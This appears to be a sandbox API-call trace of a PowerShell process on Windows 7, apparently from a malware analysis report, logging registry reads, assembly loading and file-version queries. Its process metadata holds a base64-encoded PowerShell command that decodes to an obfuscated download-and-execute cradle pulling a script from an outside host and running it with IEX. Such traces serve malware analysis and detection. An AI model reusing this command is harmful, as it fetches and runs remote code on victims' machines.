	[0950.565] VerLanguageNameW (in: wLang=0x0, szLang=0x401a60, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0950.565] CoTaskMemFree (pv=0x401a60) 
	[0950.565] VerQueryValueW (in: pBlock=0x2eb2e80, lpSubBlock="\\", lplpBuffer=0x26de98, puLen=0x26de90 | out: lplpBuffer=0x26de98*=0x2eb2ea8, puLen=0x26de90) returned 1
	[0950.573] CoTaskMemAlloc (cb=0x104) returned 0x4309c0
	[0950.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4309c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.573] CoTaskMemFree (pv=0x4309c0) 
	[0950.577] CoTaskMemAlloc (cb=0x104) returned 0x4309c0
	[0950.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4309c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.577] CoTaskMemFree (pv=0x4309c0) 
	[0950.580] lstrlenW (lpString="䅁") returned 1
	[0950.588] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dd68 | out: phkResult=0x26dd68*=0x2fc) returned 0x0
	[0953.694] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dd58 | out: phkResult=0x26dd58*=0x300) returned 0x0
	[0953.694] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dde8 | out: phkResult=0x26dde8*=0x304) returned 0x0
	[0953.700] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26dd2c, lpData=0x0, lpcbData=0x26dd28*=0x0 | out: lpType=0x26dd2c*=0x1, lpData=0x0, lpcbData=0x26dd28*=0x56) returned 0x0
	[0953.701] CoTaskMemAlloc (cb=0x5a) returned 0x45e3f0
	[0953.701] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26dcfc, lpData=0x45e3f0, lpcbData=0x26dcf8*=0x56 | out: lpType=0x26dcfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26dcf8*=0x56) returned 0x0
	[0953.701] CoTaskMemFree (pv=0x45e3f0) 
	[0953.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0953.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0953.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.695] CoTaskMemAlloc (cb=0x104) returned 0x4309c0
	[0954.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4309c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.695] CoTaskMemFree (pv=0x4309c0) 
	[0957.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0957.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0957.998] CoTaskMemAlloc (cb=0x104) returned 0x430ad0
	[0957.998] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0957.998] CoTaskMemFree (pv=0x430ad0) 
	[0958.553] CoTaskMemAlloc (cb=0x104) returned 0x430ad0
	[0958.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.553] CoTaskMemFree (pv=0x430ad0) 
	[0958.586] CoTaskMemAlloc (cb=0x104) returned 0x430ad0
	[0958.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.586] CoTaskMemFree (pv=0x430ad0) 
	[0958.588] CoTaskMemAlloc (cb=0x104) returned 0x430ad0
	[0958.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.588] CoTaskMemFree (pv=0x430ad0) 
	[0958.588] CoTaskMemAlloc (cb=0x104) returned 0x430ad0
	[0958.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.589] CoTaskMemFree (pv=0x430ad0) 
	[0960.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0960.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0961.143] CoTaskMemAlloc (cb=0x104) returned 0x430ad0
	[0961.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0961.143] CoTaskMemFree (pv=0x430ad0) 
	[0961.145] CoTaskMemAlloc (cb=0x104) returned 0x430ad0
	[0961.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430ad0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0961.145] CoTaskMemFree (pv=0x430ad0) 
	[0961.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0961.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0963.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0963.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0967.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0967.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0968.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0968.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0968.631] CoTaskMemAlloc (cb=0x104) returned 0x430cf0
	[0968.632] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x430cf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.632] CoTaskMemFree (pv=0x430cf0) 
	[0968.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26db20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0969.506] SetErrorMode (uMode=0x1) returned 0x1
	[0969.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26dcc0 | out: lpFileInformation=0x26dcc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0969.507] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 628
	os_tid = 0xd08


Thread:
	id = 642
	os_tid = 0x1438


Thread:
	id = 1431
	os_tid = 0x84c


Thread:
	id = 1440
	os_tid = 0x1d18


Thread:
	id = 1491
	os_tid = 0x14c4


Thread:
	id = 1584
	os_tid = 0x213c


Thread:
	id = 1627
	os_tid = 0x2220


Thread:
	id = 1647
	os_tid = 0x2280

	[0827.059] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Process:
	id = "121"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x60575000"
	os_pid = "0xd44"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 612
	os_tid = 0xf8c

	[0435.332] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0829.325] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0838.393] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.393] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0838.393] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0838.394] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0943.832] GetVersionExW (in: lpVersionInformation=0x26dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0943.834] GetVersionExW (in: lpVersionInformation=0x26dce0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dce0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0943.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.483] GetVersionExW (in: lpVersionInformation=0x26da50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26da50*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.484] SetErrorMode (uMode=0x1) returned 0x1
	[0944.485] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26dbb0 | out: lpFileInformation=0x26dbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0944.486] SetErrorMode (uMode=0x1) returned 0x1
	[0944.489] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26de20 | out: lpdwHandle=0x26de20) returned 0x94c
	[0944.491] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c172f0 | out: lpData=0x2c172f0) returned 1
	[0944.493] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dd98, puLen=0x26dd90 | out: lplpBuffer=0x26dd98*=0x2c1738c, puLen=0x26dd90) returned 1
	[0944.496] lstrlenW (lpString="䅁") returned 1
	[0944.504] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c17468, puLen=0x26dd00) returned 1
	[0944.506] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0944.508] CoTaskMemAlloc (cb=0x2e) returned 0x4d7340
	[0944.508] lstrcpyW (in: lpString1=0x4d7340, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0944.509] CoTaskMemFree (pv=0x4d7340) 
	[0944.509] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c174bc, puLen=0x26dd00) returned 1
	[0944.509] lstrlenW (lpString="System.Management.Automation") returned 28
	[0944.509] CoTaskMemAlloc (cb=0x3c) returned 0x49f9b0
	[0944.509] lstrcpyW (in: lpString1=0x49f9b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0944.509] CoTaskMemFree (pv=0x49f9b0) 
	[0944.509] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c17518, puLen=0x26dd00) returned 1
	[0944.509] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.509] CoTaskMemAlloc (cb=0x20) returned 0x50b8b0
	[0944.509] lstrcpyW (in: lpString1=0x50b8b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.509] CoTaskMemFree (pv=0x50b8b0) 
	[0944.509] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c17558, puLen=0x26dd00) returned 1
	[0944.509] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.510] CoTaskMemAlloc (cb=0x44) returned 0x49f9b0
	[0944.510] lstrcpyW (in: lpString1=0x49f9b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.510] CoTaskMemFree (pv=0x49f9b0) 
	[0944.510] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c175c0, puLen=0x26dd00) returned 1
	[0944.510] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0944.510] CoTaskMemAlloc (cb=0x76) returned 0x4aef30
	[0944.510] lstrcpyW (in: lpString1=0x4aef30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0944.510] CoTaskMemFree (pv=0x4aef30) 
	[0944.510] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c1765c, puLen=0x26dd00) returned 1
	[0944.510] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0944.510] CoTaskMemAlloc (cb=0x44) returned 0x49f9b0
	[0944.510] lstrcpyW (in: lpString1=0x49f9b0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0944.510] CoTaskMemFree (pv=0x49f9b0) 
	[0944.510] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c176c0, puLen=0x26dd00) returned 1
	[0944.510] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0944.510] CoTaskMemAlloc (cb=0x58) returned 0x468fa0
	[0944.510] lstrcpyW (in: lpString1=0x468fa0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0944.510] CoTaskMemFree (pv=0x468fa0) 
	[0944.510] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c1773c, puLen=0x26dd00) returned 1
	[0944.510] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0944.510] CoTaskMemAlloc (cb=0x20) returned 0x50b8b0
	[0944.510] lstrcpyW (in: lpString1=0x50b8b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0944.510] CoTaskMemFree (pv=0x50b8b0) 
	[0944.511] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x2c173e4, puLen=0x26dd00) returned 1
	[0944.511] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0944.511] CoTaskMemAlloc (cb=0x66) returned 0x501880
	[0944.511] lstrcpyW (in: lpString1=0x501880, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0944.511] CoTaskMemFree (pv=0x501880) 
	[0944.511] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x0, puLen=0x26dd00) returned 0
	[0944.511] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x0, puLen=0x26dd00) returned 0
	[0944.511] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dd08, puLen=0x26dd00 | out: lplpBuffer=0x26dd08*=0x0, puLen=0x26dd00) returned 0
	[0944.511] VerQueryValueW (in: pBlock=0x2c172f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dcd8, puLen=0x26dcd0 | out: lplpBuffer=0x26dcd8*=0x2c1738c, puLen=0x26dcd0) returned 1
	[0944.512] CoTaskMemAlloc (cb=0x204) returned 0x4b76d0
	[0944.512] VerLanguageNameW (in: wLang=0x0, szLang=0x4b76d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0945.251] CoTaskMemFree (pv=0x4b76d0) 
